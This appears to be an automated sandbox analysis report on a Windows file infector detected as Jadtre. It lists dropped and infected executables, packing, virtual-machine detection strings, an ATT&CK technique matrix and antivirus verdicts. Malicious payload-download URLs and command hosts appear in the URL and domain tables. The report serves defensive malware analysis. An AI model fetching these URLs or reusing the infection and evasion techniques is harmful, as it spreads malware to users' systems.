                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: ntvdm64.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeFile written: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeAutomated click: OK
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: 5vrRrFN56j.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: 5vrRrFN56j.exeStatic file information: File size 5541376 > 1048576
                      Source: 5vrRrFN56j.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1e3800
                      Source: 5vrRrFN56j.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x32f400
                      Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeUnpacked PE file: 1.2.WIJSmB.exe.4a0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
                      Source: Yara matchFile source: 5vrRrFN56j.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.5vrRrFN56j.exe.6e8260.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.5vrRrFN56j.exe.71e03c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5vrRrFN56j.exe.71e03c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5vrRrFN56j.exe.6e8260.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.5vrRrFN56j.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5vrRrFN56j.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2150800723.00000000006CD000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2064107799.00000000006CD000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 5vrRrFN56j.exe PID: 1896, type: MEMORYSTR
                      Source: initial sampleStatic PE information: section where entry point is pointing to: B5xBu
                      Source: 5vrRrFN56j.exeStatic PE information: section name: B5xBu
                      Source: WIJSmB.exe.0.drStatic PE information: section name: .aspack
                      Source: WIJSmB.exe.0.drStatic PE information: section name: .adata
                      Source: SciTE.exe.1.drStatic PE information: section name: u
                      Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
                      Source: MyProg.exe.1.drStatic PE information: section name: PELIB
                      Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A6076 push 004A14E1h; ret 1_2_004A6425
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A1638 push dword ptr [004A3084h]; ret 1_2_004A170E
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A600A push ebp; ret 1_2_004A600D
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A2D9B push ecx; ret 1_2_004A2DAB
                      Source: 5vrRrFN56j.exeStatic PE information: section name: B5xBu entropy: 6.934706374303615
                      Source: WIJSmB.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
                      Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.934658382910195
                      Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.934502632515406
                      Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.93338154164574

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeFile created: C:\Users\user\AppData\Local\Temp\WIJSmB.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeFile created: C:\Users\user\Desktop\update.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 799
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeDropped PE file which has not been started: C:\Users\user\Desktop\update.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1038
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exe TID: 4324Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 004A1754h1_2_004A1718
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_004A29E2
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_004A2B8C
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
                      Source: Amcache.hve.1.drBinary or memory string: VMware
                      Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: 5vrRrFN56j.exe, 00000000.00000003.2149925413.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp, 5vrRrFN56j.exe, 00000000.00000002.2152140130.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp, 5vrRrFN56j.exe, 00000000.00000002.2151893976.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332812102.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074353030.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074065250.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332812102.0000000000F16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.1.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.1.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074353030.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(=
                      Source: Amcache.hve.1.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeAPI call chain: ExitProcess graph end nodegraph_1-1012
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeCode function: 0_2_009A9044 mov eax, dword ptr fs:[00000030h]0_2_009A9044
                      Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,1_2_004A1718
                      Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exeCode function: 1_2_004A139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_004A139F
                      Source: C:\Users\user\Desktop\5vrRrFN56j.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: Process Memory Space: WIJSmB.exe PID: 6768, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: Process Memory Space: WIJSmB.exe PID: 6768, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Native API
                      1
                      DLL Side-Loading
                      1
                      Access Token Manipulation
                      1
                      Masquerading
                      11
                      Input Capture
                      11
                      System Time Discovery
                      1
                      Taint Shared Content
                      11
                      Input Capture
                      11
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts2
                      Process Injection
                      2
                      Virtualization/Sandbox Evasion
                      LSASS Memory121
                      Security Software Discovery
                      Remote Desktop Protocol1
                      Archive Collected Data
                      11
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading
                      1
                      Access Token Manipulation
                      Security Account Manager2
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Ingress Tool Transfer
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                      Process Injection
                      NTDS1
                      Process Discovery
                      Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                      Obfuscated Files or Information
                      LSA Secrets5
                      File and Directory Discovery
                      SSHKeylogging13
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                      Software Packing
                      Cached Domain Credentials24
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      5vrRrFN56j.exe95%ReversingLabsWin32.Virus.Jadtre
                      5vrRrFN56j.exe100%AviraW32/Jadtre.B
                      5vrRrFN56j.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\WIJSmB.exe100%AviraTR/Dldr.Small.Z.haljq
                      C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
                      C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
                      C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
                      C:\Users\user\AppData\Local\Temp\WIJSmB.exe100%Joe Sandbox ML
                      C:\Users\user\Desktop\update.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                      C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\WIJSmB.exe97%ReversingLabsWin32.Trojan.Skeeyah
                      C:\Users\user\Desktop\update.exe50%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://ddos.dnsnb8.net:799/cj//k2.rar100%Avira URL Cloudmalware
                      http://www.eyuyan.com0%Avira URL Cloudsafe
                      http://ddos.dnsnb8.net:799/cj//k1.raryF100%Avira URL Cloudmalware
                      http://ddos.dnsnb8.net:799/cj//k2.rarD100%Avira URL Cloudmalware
                      http://47.92.98.180:18081/myauth/web/getUserCount?skey=c0ecd8de-75e7-47a6-a22b-8adedbf78780&apikey=c0%Avira URL Cloudsafe
                      http://ddos.dnsnb8.net:799/cj//k2.rar?p100%Avira URL Cloudmalware
                      http://47.92.98.180:88/MQNT/data.txt0%Avira URL Cloudsafe
                      https://www.uc.cn/ipIP:https://api.ip.sb/iphttps://ipinfo.io/jsonip0%Avira URL Cloudsafe
                      http://ddos.dnsnb8.net:799/cj//k1.rarAcrobat100%Avira URL Cloudmalware
                      http://www.ip138.comUser-Agent:0%Avira URL Cloudsafe
                      http://ddos.dnsnb8.net:799/cj//k1.rarQ100%Avira URL Cloudmalware
                      http://47.92.98.180:88/MQNT/GX_RZ.txt0%Avira URL Cloudsafe
                      http://ddos.dnsnb8.net/100%Avira URL Cloudmalware
                      http://ddos.dnsnb8.net:799/cj//k1.rarD100%Avira URL Cloudmalware
                      https://www.uc.cn/ip0%Avira URL Cloudsafe
                      http://www.eyuyan.comservice0%Avira URL Cloudsafe
                      http://47.92.98.180:88/MQNT/MQNT.exe100%Avira URL Cloudmalware
                      http://ddos.dnsnb8.net:799/cj//k1.rarcC:100%Avira URL Cloudmalware
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ddos.dnsnb8.net
                      44.221.84.105
                      truefalse
                        high
                        www.wshifen.com
                        103.235.47.188
                        truefalse
                          high
                          www.baidu.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            http://ddos.dnsnb8.net:799/cj//k1.rarfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.eyuyan.com)DVarFileInfo$5vrRrFN56j.exe, update.exe.0.drfalse
                                high
